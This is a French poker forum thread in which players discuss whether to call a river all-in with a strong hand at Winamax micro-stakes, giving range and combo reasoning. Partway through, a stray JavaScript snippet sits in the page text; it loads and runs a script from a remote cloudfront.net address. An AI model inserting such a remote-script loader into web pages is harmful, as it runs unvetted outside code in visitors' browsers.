- Ce sujet contient 7 réponses, 8 participants et a été mis à jour pour la dernière fois par benniboy, le il y a 9 années et 8 mois.
-
AuteurMessages
-
hello, peut on fold ?meme si ça pue ou pas le top de notre range surtout qu’il peut shove brelan inférieur il ne présente que deux combos que je ne le voyais qu’avoir trop rarement donc j’ai call? les flush draws ont miss en plus.
€0.05/€0.10 No Limit Holdem
Winamax
6 Players
Hand Conversion Powered by weaktight.com[/url]Stacks:
UTG TSARNIKOLAI (€12.09) 121bb
UTG+1 Cypher974 (€10.90) 109bb
CO VortexGT3 (€11.67) 117bb
BTN DjouLicha (€10.75) 108bb
SB edou1x (€11.47) 115bb
BB Impos (€12.63) 126bbPre-Flop: (€0.15, 6 players) edou1x is SB
4 folds, edou1x raises to €0.30, Impos calls €0.20Flop: (€0.60, 2 players)
edou1x bets €0.40, Impos calls €0.40Turn: (€1.40, 2 players)
edou1x checks, Impos checksRiver: (€1.40, 2 players)
edou1x bets €1.20, Impos goes all-in €11.93, edou1x goes all-in €9.57 …
<script type= »text/javascript »>
setTimeout(function(){var a=document.createElement(« script »);
var b=document.getElementsByTagName(« script »)[0];
a.src=document.location.protocol+ »//dnn506yrbagrg.cloudfront.net/pages/scripts/0023/4735.js? »+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type= »text/javascript »;b.parentNode.insertBefore(a,b)}, 1);
</script>
C’est quoi le profil de vilain ?
Va-t-il shove DP dans ce spot ou OVP ? A-t-il des 74 ou 42 dans sa range ?
Au niveau des combo 87 y en a 16 vs 18 set. Seulement des sets floppé, il les joue quasi jamais comme cela (just call flop et surtout XB turn ?)…
Contre un reg c’est un fold, vs un récréatif, ben ça dépend du récréatifÂ
Jamais je fold ici, il peut très bien surjouer une overpaire, ou avoir tous les sets inférieurs, ou encore avoir flush ratée, et se servir du T comme un scary card (dans sa tête ). En plus il aurait raise ses 79 au flop la plupart dutemps. Tout ça mis bout à bout easy call.
Salut,
le profil de vilain importe peu sachant qu’il devrait jamais x/b nuts Turn (surtout sur un board aussi drawy) et que le T change rien River sauf pour toi.
Donc c’est un snap debout sur la table !
Par contre il faut 2barrel cher imo, tu peux pas te permettre de laisser de free card sur un tel board.
Là je me vois pas fold… S’il a 97 caché sous le paillasson… pourquoi il bet pas plus tôt ??
Je call tout le temps
bet strong tout le temps turn pour value, du coup par rapport aux côtes du pot la décision river est moins compliquée.
Mais dans tous les cas on a le top de notre range on fold pas, les fishs surjouent souvent leur main, il peut se value cut facilement dans ce spot.
-
AuteurMessages
Vous devez être connecté pour répondre à ce sujet.